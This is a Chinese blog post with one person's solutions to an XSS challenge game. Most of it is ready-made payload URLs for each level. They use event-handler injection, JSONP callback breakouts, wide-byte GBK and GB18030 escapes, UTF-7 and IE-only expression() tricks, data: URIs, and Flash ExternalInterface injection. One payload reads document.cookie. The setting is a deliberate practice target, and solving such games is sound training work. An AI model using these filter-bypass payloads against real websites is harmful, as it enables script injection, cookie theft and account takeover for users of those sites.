断断续续做完了,收获挺多的。

地址:http://xsst.sinaapp.com/xss/

二哥的xss游戏

第一题
http://xsst.sinaapp.com/xss/ext/1.php?umod=commentsoutlet&act=count&siteid=3&libid=9%3Cimg%3Ea&dataid=1480&score=1%3Cimg%20src=1%20onerror=alert(1)%3Eaa&func=haoping&_=1353475261886

第二题
http://xsst.sinaapp.com/xss/ext/2.php?callback=wooyun=a}catch(err){alert(1)}//

第三题(1)
http://xsst.sinaapp.com/xss/ext/3.1.php?word=%22%20autofocus%20onfocus=alert(1);//

第三题(2) 限制:只能在ie8以下执行
http://xsst.sinaapp.com/xss/ext/3.2.php?c=follow%22%3E%3Coboi%3E&a=index%22%3E%3Coboi%3E&appkey=801004516%22%3E%3Coboi%3E&bg=ffffff;x:%20expression(open(alert(1)))&hsize=80%22%3E%3Coboi%3E&name=Zhanglifenft%22%3E%3Coboi%3E

第三题(3) 点击go触发
http://xsst.sinaapp.com/xss/ext/3.3.php?offset=a&searchtype_yjbg=yjjgasdasd&searchvalue_yjbg=wooyunaaaa%27;alert(1);//

第四题 宽字节gb18030 是 %c0%22 || %c0%5c 如果是GBK那就是%81%22
http://xsst.sinaapp.com/xss/ext/4.php?sid=ktqO7DjMQcJuAABQ&t=dm_loginpageaaa%c0%22;alert(1);//

第五题
http://xsst.sinaapp.com/xss/ext/5.php?vt=passport&ss=aa\&from==1;function/**/from(){};alert(1);//&delegate_url=%2Fcgi-bin%2Fframe_html%3Furl%3D%25252Fcgi-bin%25252Fsetting10%25253Faction%25253Dlist%252526t%25253Dsetting10%252526ss%25253Dindex%252526Mtype%25253D1%252526clickpos%25253D20%252526loc%25253Ddelegate%25252Cwebmap%25252C%25252C1

第六题 换行符(%0a)

http://xsst.sinaapp.com/xss/ext/6.php?libid=178&FilterAttrAND=3602&FilterValueAND=dotaaaa%0a%20alert(1);//

第七题

http://xsst.sinaapp.com/xss/ext/7.php?mod=search&type=data&site=digi&libid=2&curpage=1&pagenum=30&filterattr=138,138|16|4,5,4,5&filtervalue=3500-4000,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,HSDPA,HSDPA&tplname=centersearch.shtml&orderby=price%c0%22%0aalert(2);//

上面的是我的答案,下面是二哥的答案 都差不多
http://xsst.sinaapp.com/xss/ext/7.php?mod=search&type=data&site=digi&libid=2&curpage=1&pagenum=30&filterattr=138,138|16|4,5,4,5&filtervalue=3500-4000,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,HSDPA,HSDPA&tplname=centersearch.shtml&orderby=price%c0%5c%0aalert(1);//

第八题(1)

js转义,利用(Xss测试字符串转换工具),里面有unicode和base16
http://xsst.sinaapp.com/xss/ext/8.1.php?data=asa\u003ciframe%20onload=alert(1)\u003e

http://xsst.sinaapp.com/xss/ext/8.1.php?data=\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x32\x33\x29\x3e

第八题(2)

http://xsst.sinaapp.com/xss/ext/8.2.php?libid=1&keyvalue=\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x32\x33\x29\x3e&attr=133&stype=2&tname=star_second.shtml

第九题(1) ie下触发
http://xsst.sinaapp.com/xss/ext/9.1.htm?site=wooyun&name=%3Csvg/onload=alert(1)%3E&age=0

第九题(2)

http://xsst.sinaapp.com/xss/ext/9.2.htm?sid=%22%3E%3Csvg/onload=alert(1)%3E

第十题:

http://xsst.sinaapp.com/xss/ext/10.htm?alert(1);//=%E6%B8%B8%E6%88%8Fkkk

第十一题

http://xsst.sinaapp.com/xss/ext/11.htm?url=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+

第十二题

http://xsst.sinaapp.com/xss/ext/12.php?type=menu&np=11&pro=256&searchtype=2&cs=0010000&keyword=%26callback=alert(1);//PTAG=20058.13.13

第十三题:我的是在ie和火狐上触发,根据二哥的答案(2),由于字符串在script标签里面,所以可以用unicode编码去绕过单引号的过滤。\u0027
(1)
http://xsst.sinaapp.com/xss/ext/13.php?receive=yes&mod=login&op=callback&referer=wooyun%22%3E%3Cscript%3Ealert(1);%3C/script%3E&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772&timestamp=1354305802
(2)
xsst.sinaapp.com/xss/ext/13.php?receive=yes&mod=login&op=callback&referer=wooyun\u0027;alert(1);//&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772&timestamp=1354305802

第十五题:http://xsst.sinaapp.com/xss/ext/15.swfupload.swf?movieName=aaa%22])}catch(e){alert(1)};//

this.flashReady_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].flashReady";
搜索flashReady_Callback 往下调用
ExternalCall.Simple(this.flashReady_Callback);
搜索Simple,发现如下调用,param1存在第一个参数里,
ExternalInterface.call("函数名","参数1");
看做js里面的 函数名("参数1");
而FLASH里实际最后执行的JS代码,形式如下(至于下面这句哪里来的,暂时不表): try { __flash__toXML(函数名("参数1")) ; } catch (e) { "<undefined/>"; } 因而 函数名 部分也可以写为 (function(){alert("hi jack")}) 的形式。

public static function Simple(param1:String) : void
{
ExternalInterface.call(param1);
}

try { __flash__toXML(console.log("\\" ));alert(/XSS/);}catch(e){} //")) ; } catch (e) { "<undefined/>"; }

try { __flash__toXML(SWFUpload.instances[\" aa"])}catch(e){alert(1)}// \"].flashReady)) ; } catch (e) { "<undefined/>"; }

参考资料:http://www.cnblogs.com/kenkofox/p/3405395.html

第十六题(1):
http://xsst.sinaapp.com/xss/ext/16.1.swf?id=alert(1);\%22));open_flash_chart_data();}%20catch%20(e)%20{%20alert(1);%20}//

第十六题(2)配置一台能被跨域请求的docker型的服务器

第十七题(1)
火狐,ie6,7 触发,
http://xsst.sinaapp.com/xss/ext/17.php?game=roco&uin=%22%3E%3Cimg%20src=1%20onerror=alert(1)%3E&world=5&roleid=44583443&level=8&role=me

第十七题(2)
ie6触发,utf-7
http://xsst.sinaapp.com/xss/ext/utf-7.php?callback=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg-%20xsadas

第十七题(3)

ie8 触发

http://xsst.sinaapp.com/xss/ext/ie8-bypass.php?t=test%22id=%3E%3Cdiv/id=x%3Ex%3C/div%3E%3Cxml:namespace%20prefix=t%3E%3Cimport%20namespace=t%20implementation=%23default%23time2%3E%3Ct:set/attributename=innerHTML%20targetElement=x%20to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;document.cookie%26%23x29;%26gt;%3E

第十八题
答案已经被chrome过滤了
http://xsst.sinaapp.com/xss/ext/18.htm#siDomain=1&g_StyleID="><scv6/ript>alert(1)</script>
在ie6,7下触发
http://xsst.sinaapp.com/xss/ext/18.htm#siDomain=1&g_StyleID="><script>alert(1)</script>

第十九题

http://xsst.sinaapp.com/xss/ext/19.php
把名字改成<svg/onload=alert(1)>
发送语音时候点开链接触发

二哥的xss游戏的更多相关文章

  1. 有趣的游戏:Google XSS Game

    Google最近出了一XSS游戏: https://xss-game.appspot.com/ 我这个菜鸟看提示,花了两三个小时才全过了.. 这个游戏的规则是仅仅要在攻击网页上弹出alert窗体就能够 ...

  2. XSS 自动化检测 Fiddler Watcher & x5s & ccXSScan 初识

    一.标题:XSS 自动化检测 Fiddler Watcher & x5s  & ccXSScan 初识     automated XSS testing assistant 二.引言 ...

  3. XSS自动化检测 Fiddler Watcher & x5s & ccXSScan 初识

    一.标题:XSS 自动化检测 Fiddler Watcher & x5s  & ccXSScan 初识     automated XSS testing assistant 二.引言 ...

  4. xss 学习(一)

    存储型 .反射型.DOM 型这是最常见的三种分类: 存储型存储型XSS也叫持久型XSS,存储的意思就是Payload是有经过存储的,当一个页面存在存储型XSS的时候,XSS注入成功后,那么每次访问该页 ...

  5. 先知xss挑战赛学习笔记

    xss游戏 游戏地址:http://ec2-13-58-146-2.us-east-2.compute.amazonaws.com/ LEMON参考wp地址 1. 文件上传 源码如下 <?php ...

  6. xss games20关小游戏附源代码

    1. get方式的的值直接输出来了. ?name=<script>alert(1)</script> 2. 同样没有过滤,不过需要闭合前边的双引号和>. "&g ...

  7. XSS挑战之旅---游戏通关攻略

    最近发现一个有趣的XSS闯关小游戏,游戏的作者是先知社区的大佬Mramydnei,喜欢XSS的大家可以一起来学习交流. 现在我把自己在前面的十八关里面的闯关过程记录一下,大神绕行,我是菜鸟,大家可以一 ...

  8. xss小游戏通关

    xss url:http://test.ctf8.com/level1.php?name=test 小游戏payload: <script>alert("'test'" ...

  9. XSS闯关游戏准备阶段及XSS构造方法

    请下载好XSS闯关文件后,解压后放在服务器的对应文件夹即可 在该闯关中,会在网页提示一个payload数值 payload,翻译过来是有效载荷 通常在传输数据时,为了使数据传输更可靠,要把原始数据分批 ...

随机推荐

  1. 接口登录CSDN发布博客---封装方法,使用unittest框架

    一个简单的跑接口流程:登录后发表带图片的博客.这里涉及到的知识点: 1.登录时通过cookies去保持登录状态,把cookies添加到一个session中,这样可以保持长时间登录状态: 2.我们通过爬 ...

  2. beta冲刺4

    昨天的问题: 我的社团数据库表项的处理,代码修改后结果无法显示. 帖子内容无法显示出来. 首页图像未替换 登陆整合没有完成 今天的完成: 服务器部署成功 页面背景修改.(已上传,未确认实装.) 任务截 ...

  3. 第1次作业:小菜鸟的平凡IT梦

    #1.结缘计算机的始末 ##1.1与计算机相识的几年 作为一个95后,出生在一个互联网开始兴盛的时代.我记得小学的时候,开始知道电脑这个东西,学校有了机房,开始有了所谓的电脑课.那时候计算机对于我来说 ...

  4. alpha-咸鱼冲刺day2

    一,合照 emmmmm.自然是没有的. 二,项目燃尽图 三,项目进展 今天并没有什么进展,弄了好久好像也只研究出怎么把JS的功能块插入进去.html的信息提交这些还不知道要怎么弄. 四,问题困难 日常 ...

  5. Beta阶段敏捷冲刺报告-DAY5

    Beta阶段敏捷冲刺报告-DAY5 Scrum Meeting 敏捷开发日期 2017.11.6 会议时间 12:00 会议地点 软工所 参会人员 全体成员 会议内容 乱序问题的解决,异常输入提示 讨 ...

  6. 《招一个靠谱的移动开发》iOS面试题及详解(上篇)

    以下问题主要用于技术的总结与回顾 主要问题总结 单例的写法.在单利中创建数组应该注意些什么. NSString 的时候用copy和strong的区别. 多线程.特别是NSOperation 和 GCD ...

  7. 解决background图片拉伸问题

    ImageView中XML属性src和background的区别: background会根据ImageView组件给定的长宽进行拉伸,而src就存放的是原图的大小,不会进行拉伸.src是图片内容(前 ...

  8. Linux 下的权限改变与目录配置

    Linux 下的权限改变与目录配置 ./代表本目录的意思. (1):用户与用户组, 1:文件所有者,文件被某一用户所有 2:用户组:    对文件给与一个或者多个用户权限配置 3:其它人: (2):l ...

  9. 【微软大法好】VS Tools for AI全攻略

    大家都知道微软在Connect();17大会上发布了VS Tools for AI,旨在提升Visual Studio和VSCode对日益增长的深度学习需求的体验.看了一圈,网上似乎没有一个完整的中文 ...

  10. 测试驱动开发实践3————从testList开始

    [内容指引] 运行单元测试: 装配一条数据: 模拟更多数据测试列表: 测试无搜索列表: 测试标准查询: 测试高级查询. 一.运行单元测试 我们以文档分类(Category)这个领域类为例,示范如何通过 ...